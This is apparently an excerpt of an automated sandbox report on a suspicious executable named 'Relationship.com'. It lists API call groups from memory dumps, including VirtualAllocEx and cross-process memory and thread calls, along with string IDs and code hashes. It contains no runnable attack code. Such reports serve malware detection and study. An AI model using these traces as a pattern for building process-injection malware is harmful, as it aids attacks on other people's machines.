                                                                                                                                                                                                                                                                              • Part of subcall function 00C5BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C52AE1,00000034,?,?,00001004,00000000,00000000), ref: 00C5BD42
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C5311A
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C53167
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                            • Opcode ID: 7477b329601f363ad6cebdceffbd82ac6648348c63930769cdd6e0e31772db20
                                                                                                                                                                                                                                                                            • Instruction ID: bcf23ff374a022fa36d19f47a28638d974321774bf5c8a9eb479ce44c29a6036
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7477b329601f363ad6cebdceffbd82ac6648348c63930769cdd6e0e31772db20
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C414676900218AFDB10DBA4CD81AEEBBB8EF49741F004095FA55B7184DA706F89DBA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\523266\Relationship.com,00000104), ref: 00C21AD9
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C21BA4
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C21BAE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                            • API String ID: 2506810119-2986333598
                                                                                                                                                                                                                                                                            • Opcode ID: b0f7a2d87616b1b9504b7b5debe6610d3c4d2cd151ef26baa7830ca3a8e62a67
                                                                                                                                                                                                                                                                            • Instruction ID: ae298d5774a42ea5878b3650cbd92cd9af1c7d2e4c0ae735722926b8f107d902
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0f7a2d87616b1b9504b7b5debe6610d3c4d2cd151ef26baa7830ca3a8e62a67
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA3162B1A00228EFCB21DF99EC85E9EBBFCEB95710B1841A6FC1497611E6704F41DB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C5CBB1
                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00C5CBF7
                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CC29C0,01586E98), ref: 00C5CC40
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: 8e53dd0d785a71e92a0d7d282b59b2e42e91e5704a1593f1f8028cb79e98b345
                                                                                                                                                                                                                                                                            • Instruction ID: 6b9f28866b20be7538e4057df36f8457849c586f700c5442fe15439aad15d049
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e53dd0d785a71e92a0d7d282b59b2e42e91e5704a1593f1f8028cb79e98b345
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1941D4792043019FD720DF28D8C5B1AB7E4EF85715F04461EF9A9972D1C730E988CB5A
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C8DCD0,00000000,?,?,?,?), ref: 00C84F48
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32 ref: 00C84F65
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C84F75
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Long
                                                                                                                                                                                                                                                                            • String ID: SysTreeView32
                                                                                                                                                                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                            • Opcode ID: d5cb709e42a427905e984fd6679d6349de036c66d6d9e05cff06ddae85b9d858
                                                                                                                                                                                                                                                                            • Instruction ID: 3a1bff9b0d5a64b080325bbd6d5da659c4ae0af7a06946f89ee6e50e624b44d8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5cb709e42a427905e984fd6679d6349de036c66d6d9e05cff06ddae85b9d858
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2631B23111020AAFDB249F78CC45BEA77A9EF08338F214729FA75931D0D770AD509B54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C73DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C73AD4,?,?), ref: 00C73DD5
                                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C73AD7
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C73AF8
                                                                                                                                                                                                                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 00C73B63
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                            • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                            • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                            • Opcode ID: 341803d511d7a6f3a5dc5dae0214af42649ceb0c62265f5cb91ea37803b072a3
                                                                                                                                                                                                                                                                            • Instruction ID: 450737127f0eb263dea2fedb701921616e740e6cef72403e556db4cfd5c6a2a3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 341803d511d7a6f3a5dc5dae0214af42649ceb0c62265f5cb91ea37803b072a3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7731B339600281DFCB10CF69C585EA97BE0EF54314F24C159E82A8B392D731EF45E760
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C849DC
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C849F0
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C84A14
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                            • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                            • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                            • Opcode ID: d8dd13b9291528bfc46bc0d1801db65a2b650ffc14636774a62c4ed61526c44c
                                                                                                                                                                                                                                                                            • Instruction ID: d535c629d95e3c0a61b02403a2accb974761a9c69a8cb52644dbcaefb0dae32b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8dd13b9291528bfc46bc0d1801db65a2b650ffc14636774a62c4ed61526c44c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C721BF32600229BBDF259F50CC42FEF3B69EF48728F110214FA156B0D0DAB1A8559B94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C851A3
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C851B1
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C851B8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                            • String ID: msctls_updown32
                                                                                                                                                                                                                                                                            • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                            • Opcode ID: c91c9528a024ba299305e2798d307fbc196450bcd3a973322ff886f213db3293
                                                                                                                                                                                                                                                                            • Instruction ID: 03cac16fc0997515ec2197502cef46bc9aa3983d6a218284789452be55f7ea3f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c91c9528a024ba299305e2798d307fbc196450bcd3a973322ff886f213db3293
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B72192B5600609BFDB10DF14CC85EBB37ADEB59368B000159F911973A1CB70EC15DB64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C842DC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C842EC
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C84312
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                            • String ID: Listbox
                                                                                                                                                                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                            • Opcode ID: 72ad5734e36f6eef3376efdc406817cf32d9271619bc22c7a514879967bea7fe
                                                                                                                                                                                                                                                                            • Instruction ID: db00ab03ba23d8671a26a0c841e51009f88c2f80bd46c6453ec0e7d3d88a0998
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72ad5734e36f6eef3376efdc406817cf32d9271619bc22c7a514879967bea7fe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B821C232604219BBEF159F94CC84FBF3B6EEF89768F118114F9119B190CA719C5287A4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C6544D
                                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C654A1
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,00C8DCD0), ref: 00C65515
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                            • String ID: %lu
                                                                                                                                                                                                                                                                            • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                            • Opcode ID: 2caa744a96a2caa613f4fa9482a37239106b53a68b21b72a8df3ab4927dad408
                                                                                                                                                                                                                                                                            • Instruction ID: bb8ee8ce1a232bdb68b49580a458b43d3f034b9b4742b2f481e4e3b4c6f64f95
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2caa744a96a2caa613f4fa9482a37239106b53a68b21b72a8df3ab4927dad408
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1314F75A00209AFDB10DF54C885EAE77F8EF05318F1440A9E909DB2A2DB71EE45DB61
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C84CED
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C84D02
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C84D0F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                            • Opcode ID: a5f6ed5670b35541289c9172ec38a0d22be301b2dd2446aad5134cfc2a57d752
                                                                                                                                                                                                                                                                            • Instruction ID: d1ee5fd0a0ca74d641b6b9cb3ee1ef1e9cb6c9632736f00ffecdbe3b154cbb05
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5f6ed5670b35541289c9172ec38a0d22be301b2dd2446aad5134cfc2a57d752
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38110671240249BFEF206F65CC06FAB3BACEF85B69F110519FA51E60A0C671DC51DB24
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C536F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C53712
                                                                                                                                                                                                                                                                              • Part of subcall function 00C536F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C53723
                                                                                                                                                                                                                                                                              • Part of subcall function 00C536F4: GetCurrentThreadId.KERNEL32 ref: 00C5372A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C536F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C53731
                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 00C538C4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5373B: GetParent.USER32(00000000), ref: 00C53746
                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00C5390F
                                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(?,00C53987), ref: 00C53937
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                            • String ID: %s%d
                                                                                                                                                                                                                                                                            • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                            • Opcode ID: c804c5fad29ea864500582b61c2e2e94b023b2cbc57ab3358752f94369d29918
                                                                                                                                                                                                                                                                            • Instruction ID: 7a3035f50636666c78ed193dd5b14630aa78a12fb5987a401d82d19e984b80e5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c804c5fad29ea864500582b61c2e2e94b023b2cbc57ab3358752f94369d29918
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 121105B56002496BCF01BF709C85BED77A9AF94344F004079BD099B292DE704A89DB24
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C86360
                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C8638D
                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32(?), ref: 00C8639C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: a870cfdc0696d698cba4a7442a21117a5e08dcd9a1e8c27014ed2ea7ecf6b659
                                                                                                                                                                                                                                                                            • Instruction ID: e2a40cedc3222e55666e06ac5787ca4bd7da82f7c2a52df4a0ab1ca2a81e09fc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a870cfdc0696d698cba4a7442a21117a5e08dcd9a1e8c27014ed2ea7ecf6b659
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1201AD71500208AFDB10AF11DC84BEE7BB5FB45356F2080AAF90AD6160CF708A80EF20
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
